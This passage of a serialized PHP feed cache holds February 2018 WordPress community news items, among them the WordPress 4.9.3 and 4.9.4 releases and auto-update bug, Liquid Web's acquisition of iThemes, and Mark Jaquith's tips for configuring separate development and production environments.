tested them for compatibility with 3.3.1.</p>\n<p><a href=\"https://github.com/woocommerce/woocommerce/wiki/Template-File-Guidelines-for-Devs-and-Theme-Authors#hook-vs-override---when-to-use-what\">WooCommerce developers recommend</a> that theme authors use hooks instead of template overrides to ensure maximum compatibility.</p>\n<p>According to Mike Jolley, WooCommerce lead developer, this release highlighted issues with the template system&#8217;s extensibility and a disconnect between theme authors on external marketplaces. &#8220;We hope to find solutions to these problems in the near future,&#8221; Jolley said.</p>\n<p>WooCommerce 3.3.1 has at least <a href=\"https://github.com/woocommerce/woocommerce/compare/3.3.0...3.3.1\">90 commits</a>. Users are encouraged to create a full-backup of their sites and then browse to Dashboard &gt; Updates to update WooCommerce from within WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Feb 2018 09:46:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: WordPress 4.9.4 Fixes Critical Auto Update Bug in 4.9.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78087\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wptavern.com/wordpress-4-9-4-fixes-critical-auto-update-bug-in-4-9-3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1984:\"<p>Hours after <a href=\"https://wptavern.com/wordpress-4-9-3-released-fixes-34-bugs\">WordPress 4.9.3 was released</a>, the WordPress development team followed it up <a href=\"https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/\">with 4.9.4</a> to fix a critical bug with the auto update process. The bug generates a fatal PHP error when WordPress attempts to update itself.</p>\n<p>This error requires WordPress site owners and administrators to manually update to WordPress 4.9.4 by visiting your Dashboard and clicking the Update Now button on the Updates page. Alternatively, you can update by uploading the files via SFTP or by using WP-CLI.</p>\n<p>Dion Hulse, WordPress lead developer, says managed hosts that apply updates automatically for their customers will be able to update sites as they normally do. This may explain why some users have reported that sites running 4.9.3 have automatically updated to 4.9.4 without issue.</p>\n<p>The bug stems from an attempt to <a href=\"https://core.trac.wordpress.org/ticket/43103\">reduce the number of API calls</a> made when the auto update cron job is run. Unfortunately, the code committed had unintended consequences. &#8220;It triggers a fatal error as not all of the dependencies of <code>find_core_auto_update()</code> are met,&#8221; Hulse said.</p>\n<p>A postmortem will be published once the team determines how to prevent this mistake from happening in the future. &#8220;We don’t like bugs in WordPress any more than you do, and we’ll be taking steps to both increase automated coverage of our updates and improve tools to aid in the detection of similar bugs before they become an issue in the future,&#8221; Hulse said.</p>\n<p>While WordPress 4.9.3 and 4.9.4 do not include any security fixes, it&#8217;s important to note that in order to receive automatic security updates in the future, sites using the 4.9 branch must be running at least 4.9.4. Older branches are unaffected.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 07 Feb 2018 09:19:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Dev Blog: WordPress 4.9.4 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5559\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1814:\"<p>WordPress 4.9.4 is now available.</p>\n<p>This maintenance release fixes a severe bug in 4.9.3, which will cause sites that support automatic background updates to fail to update automatically, and will require action from you (or your host) for it to be updated to 4.9.4.</p>\n<p>Four years ago with <a href=\"https://wordpress.org/news/2013/10/basie/\">WordPress 3.7 &#8220;Basie&#8221;</a>, we added the ability for WordPress to self-update, keeping your website secure and bug-free, even when you weren&#8217;t available to do it yourself. For four years it&#8217;s helped keep millions of installs updated with very few issues over that time. Unfortunately <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\">yesterdays 4.9.3 release</a> contained a severe bug which was only discovered after release. The bug will cause WordPress to encounter an error when it attempts to update itself to WordPress 4.9.4, and will require an update to be performed through the WordPress dashboard or hosts update tools.</p>\n<p>WordPress managed hosting companies who install updates automatically for their customers can install the update as normal, and we&#8217;ll be working with other hosts to ensure that as many customers of theirs who can be automatically updated to WordPress 4.9.4 can be.</p>\n<p>For more technical details of the issue, we&#8217;ve <a href=\"https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/\">posted on our Core Development blog</a>. For a full list of changes, consult the <a href=\"https://core.trac.wordpress.org/query?status=closed&milestone=4.9.4&group=component\">list of tickets</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.9.4</a> or visit Dashboard → Updates and click “Update Now.”</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 06 Feb 2018 16:17:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dion Hulse\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WPTavern: WordPress 4.9.3 Released, Fixes 34 Bugs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78081\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wptavern.com/wordpress-4-9-3-released-fixes-34-bugs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:681:\"<p>WordPress 4.9.3 <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\">is available</a> and fixes 34 bugs. Customizer changesets, the visual editor, widgets, and compatibility for PHP 7.2 highlight this release. You can view all of the changes via the <a href=\"https://core.trac.wordpress.org/log/branches/4.9?rev=42630&stop_rev=42521\">changelog</a> or <a href=\"https://core.trac.wordpress.org/query?status=closed&milestone=4.9.3&group=component\">trac tickets</a>. Most sites will update automatically. However, if you want to trigger the update ahead of time or manually update, visit your Dashboard, click the Updates link, and click Update Now.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 06 Feb 2018 08:35:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Liquid Web Acquires iThemes in Multi-Million Dollar Deal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=77907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wptavern.com/liquid-web-acquires-ithemes-in-multi-million-dollar-deal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4149:\"<p>Liquid Web, a managed hosting service founded in 1997, <a href=\"https://www.liquidweb.com/blog/liquid-web-acquires-ithemes/\">has acquired</a> <a href=\"https://ithemes.com/\">iThemes</a>. iThemes recently <a href=\"https://ithemes.com/10-years-in-wordpress/\">celebrated its 10th year</a> in business. <a href=\"https://poststatus.com/liquid-web-acquired-ithemes/\">PostStatus reports</a> that it was an all cash deal and sources confirmed to the Tavern that it was a multi-million dollar acquisition.</p>\n<p>iThemes will continue to operate as an independent unit within Liquid Web. Cory Miller will remain as General Manager of iThemes and the company will keep its office and employees in Oklahoma City, OK.</p>\n<p>iThemes was founded in 2008 and is part of a group of WordPress focused companies that started <a href=\"https://medium.com/@jasonpatricksc/a-brief-history-of-a-wordpress-theme-business-3847e16fcba4\">around the same time</a>. The group includes WooThemes, Revolution Themes now known as StudioPress, Press75, WPZoom, and others.</p>\n<p>WooThemes was <a href=\"https://wptavern.com/automattic-acquires-woocommerce\">acquired by Automattic</a>. StudioPress has branched off into content marketing with CopyBlogger and hosting via StudioPress sites. Press75 was acquired by Westwerk in 2014 and WPZoom continues to operate independently.</p>\n<p>iThemes diversified its business a number of times over the years, adding plugins and services to its portfolio. Some of the most notable products include, FlexxTheme, BackupBuddy, Builder, iThemes Sync, and iThemes Security. In 2013, the company branched off into the e-commerce space <a href=\"https://wptavern.com/ithemes-launches-e-commerce-plugin-exchange\">with Exchange</a>. In 2017, <a href=\"https://ithemes.com/2017/07/13/ithemes-exchange-new-home-exchangewpcom/\">Exchange was acquired</a> by AJ Morris allowing the company to focus on iThemes Sales Accelerator, a new product that works exclusively with WooCommerce.</p>\n<p>Considering Liquid Web recently launched <a href=\"https://www.liquidweb.com/products/managed-woocommerce-hosting/\">its managed WooCommerce hosting</a>, iThemes Sales Accelerator should pair nicely with its services.</p>\n<p>This isn&#8217;t the first time a large webhosting company has acquired a WordPress business. In the last two years, GoDaddy has acquired three companies with a presence in the WordPress ecosystem.</p>\n<ul>\n<li><strong>April 2013</strong> EIG Acquires MOJO-Themes</li>\n<li><strong>September 2016</strong> GoDaddy Acquires ManageWP</li>\n<li><strong>December 2016</strong> GoDaddy Acquires WP Curve</li>\n<li><strong>March 2017</strong> GoDaddy Acquires Sucuri</li>\n</ul>\n<h2>After 10 Years, Cory Miller Lets Go</h2>\n<p>Miller founded iThemes 10 years ago and helped navigate it through the ups and downs that come with running a business. Although Miller no longer owns the company he founded, he&#8217;s excited about the next chapter and the opportunities it presents to him and his team.</p>\n<p>&#8220;One of the keys that has contributed greatly to our success over the last 10 years is being willing to adapt and to innovate and to try new things,&#8221; Miller said. &#8220;For instance, If we’d kept focusing solely on WordPress themes, which was our primary business for the early years, we wouldn’t be around today.</p>\n<p>&#8220;As we surveyed the landscape in WordPress, one thing was very obvious to us: hosting is the future. As a bootstrapped company from the beginning, with our DNA as a software company, and seeing where Liquid Web is going, it just made sense for us to join forces.</p>\n<p>&#8220;We view this is as another chapter in our story of our willingness to adapt and try new things so we can keep doing what we do best — Make People’s Lives Awesome. So we&#8217;re tremendously excited about our future with Liquid Web, and what we’re going to be able to do for the WordPress community together.&#8221;</p>\n<p>Miller says they&#8217;re in the middle of the transition process and are working towards tighter integration between iThemes&#8217; products and Liquid Web&#8217;s managed hosting services.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 06 Feb 2018 00:33:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"Dev Blog: WordPress 4.9.3 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5545\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3408:\"<p>WordPress 4.9.3 is now available.</p>\n<p>This maintenance release fixes 34 bugs in 4.9, including fixes for Customizer changesets, widgets, visual editor, and PHP 7.2 compatibility. For a full list of changes, consult the <a href=\"https://core.trac.wordpress.org/query?status=closed&milestone=4.9.3&group=component\">list of tickets</a> and the <a href=\"https://core.trac.wordpress.org/log/branches/4.9?rev=42630&stop_rev=42521\">changelog</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.9.3</a> or visit Dashboard → Updates and click “Update Now.” Sites that support automatic background updates are already beginning to update automatically.</p>\n<p>Thank you to everyone who contributed to WordPress 4.9.3:</p>\n<p><a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/abdullahramzan/\">abdullahramzan</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andreiglingeanu/\">andreiglingeanu</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/bpayton/\">Brandon Payton</a>, <a href=\"https://profiles.wordpress.org/chetan200891/\">Chetan Prajapati</a>, <a href=\"https://profiles.wordpress.org/coleh/\">coleh</a>, <a href=\"https://profiles.wordpress.org/darko-a7/\">Darko A7</a>, <a href=\"https://profiles.wordpress.org/desertsnowman/\">David Cramer</a>, <a href=\"https://profiles.wordpress.org/dlh/\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/flixos90/\">Felix Arntz</a>, <a href=\"https://profiles.wordpress.org/frank-klein/\">Frank Klein</a>, <a href=\"https://profiles.wordpress.org/pento/\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/jbpaul17/\">Jeffrey Paul</a>, <a href=\"https://profiles.wordpress.org/lizkarkoski/\">lizkarkoski</a>, <a href=\"https://profiles.wordpress.org/clorith/\">Marius L. J.</a>, <a href=\"https://profiles.wordpress.org/mattyrob/\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/monikarao/\">Monika Rao</a>, <a href=\"https://profiles.wordpress.org/munyagu/\">munyagu</a>, <a href=\"https://profiles.wordpress.org/ndavison/\">ndavison</a>, <a href=\"https://profiles.wordpress.org/nickmomrik/\">Nick Momrik</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/rachelbaker/\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rishishah/\">rishishah</a>, <a href=\"https://profiles.wordpress.org/othellobloke/\">Ryan Paul</a>, <a href=\"https://profiles.wordpress.org/sasiddiqui/\">Sami Ahmed Siddiqui</a>, <a href=\"https://profiles.wordpress.org/sayedwp/\">Sayed Taqui</a>, <a href=\"https://profiles.wordpress.org/seanchayes/\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shooper/\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/manikmist09/\">Sultan Nasir Uddin</a>, <a href=\"https://profiles.wordpress.org/tigertech/\">tigertech</a>, and <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Feb 2018 19:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Sergey Biryukov\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"Mark Jaquith: Tips for configuring WordPress environments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://markjaquith.wordpress.com/?p=5476\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://markjaquith.wordpress.com/2018/02/05/tips-for-configuring-wordpress-environments/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4626:\"<p>Many WordPress hosts will give your site a &#8220;staging&#8221; environment. You can also use tools like <a href=\"https://local.getflywheel.com/\">Local by Flywheel</a>, or <a href=\"https://www.mamp.info/\">MAMP Pro</a> to run a local &#8220;dev&#8221; version of your site. These are great ways of testing code changes, playing with new plugins, or making theme tweaks, without risking breaking your live &#8220;production&#8221; site.</p>\n<p>Here is my advice for working with different WordPress environments.</p>\n<h2>Handling Credentials</h2>\n<p>The live (&#8220;production&#8221;) version of your site should be opt-in. That is, your site&#8217;s Git repo should <strong>not</strong> store production credentials in <strong>wp-config.php</strong>. You don&#8217;t want something to happen like <a href=\"https://www.reddit.com/r/cscareerquestions/comments/6ez8ag/accidentally_destroyed_production_database_on/\">when this developer accidentally connected to the production database</a> and destroyed all the company data on his first day.</p>\n<p>Instead of keeping database credentials in <strong>wp-config.php</strong>, have <strong>wp-config.php</strong> look for a <strong>local-config.php</strong> file. Replace the section that defines the database credentials with something like this:</p>\n<pre class=\"brush: php; title: ; notranslate\">if ( file_exists( __DIR__ . \'/local-config.php\' ) ) {\n    include( __DIR__ . \'/local-config.php\' );\n} else {\n    die( \'local-config.php not found\' );\n}</pre>\n<p>Make sure you add <strong>local-config.php</strong> to your <strong>.gitignore</strong> so that no one commits their local version to the repo.</p>\n<p>On production, you&#8217;ll create a <strong>local-config.php</strong> with production credentials. On staging or development environments, you&#8217;ll create a <strong>local-config.php</strong> with the credentials for those environments.</p>\n<h2>Production is a Choice</h2>\n<p>Right after the section that calls out <strong>local-config.php</strong>, put something like this:</p>\n<pre class=\"brush: php; title: ; notranslate\">if ( ! defined( \'WP_ENVIRONMENT\' ) ) {\n    define( \'WP_ENVIRONMENT\', \'development\' );\n}</pre>\n<p>The idea here is that there will always be a <strong>WP_ENVIRONMENT</strong> constant available to you that tells you what kind of environment your site is being run in. In production, you will put this in <strong>local-config.php</strong> along with the database credentials:</p>\n<pre class=\"brush: php; title: ; notranslate\">define( \'WP_ENVIRONMENT\', \'production\' );</pre>\n<p>Now, in your theme, or your custom plugins, or other code, you can do things like this:</p>\n<pre class=\"brush: php; title: ; notranslate\">if ( \'production\' === WP_ENVIRONMENT ) {\n    add_filter( \'option_gravityformsaddon_gravityformsstripe_settings\', function( $stripe_settings ) {\n        $stripe_settings[\'api_mode\'] = \'live\';\n        return $stripe_settings;\n    });\n} else {\n    add_filter( \'option_gravityformsaddon_gravityformsstripe_settings\', function( $stripe_settings ) {\n        $stripe_settings[\'api_mode\'] = \'test\';\n        return $stripe_settings;\n    });\n}</pre>\n<p>This bit of code is for the Easy Digital Downloads Stripe gateway plugin. It makes sure that on the production environment, the payment gateway is always in <strong>live</strong> mode, and the anywhere else, it is always in <strong>test</strong> mode. This protects against two very bad situations: connecting to live services from a test environment (which could result in customers being charged for test transactions) and connecting to test services from a live environment (which could prevent customers from purchasing products on your site).</p>\n<p>You can also use this pattern to do things like hide Google Analytics on your test sites, or make sure debug plugins are only active on development sites (more on that, in a future post!)</p>\n<p>Don&#8217;t rely on complicated procedures (&#8220;step 34: make sure you go into the Stripe settings and switch the site to test mode on your local test site&#8221;) — make these things explicit in code. Make it impossible to screw it up, and working on your sites will become faster and less stressful.</p>\n<hr />\n<p><b>Do you need <a href=\"https://coveredwebservices.com/\">WordPress services?</a></b></p>\n<p>Mark runs <a href=\"https://coveredwebservices.com/\">Covered Web Services</a> which specializes in custom WordPress solutions with focuses on security, speed optimization, plugin development and customization, and complex migrations.</p>\n<p>Please reach out to start a conversation!</p>\n[contact-form]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Feb 2018 14:59:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mark Jaquith\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"Matt: National Magazine Award Nomination\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=47900\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://ma.tt/2018/02/national-magazine-award-nomination/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:761:\"<p>Longreads <a href=\"http://www.magazine.org/asme/about-asme/pressroom/asme-press-releases/ellies-2018-finalists-announced\">was nominated today</a> for its first-ever <a href=\"https://en.wikipedia.org/wiki/National_Magazine_Awards\">National Magazine Award</a>, in the category of columns and commentary, alongside ESPN The Magazine, BuzzFeed News, Pitchfork, and New York magazine. Laurie Penny&#x27;s Longreads columns <a href=\"https://longreads.com/tag/metoo-and-consent/\">explore important questions of consent and female desire</a> that have strongly resonated in our current moment. In addition to this nomination, Penny&#x27;s columns have been translated and republished in Italian and German newspapers, and will be collected in a forthcoming book.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Feb 2018 21:37:36 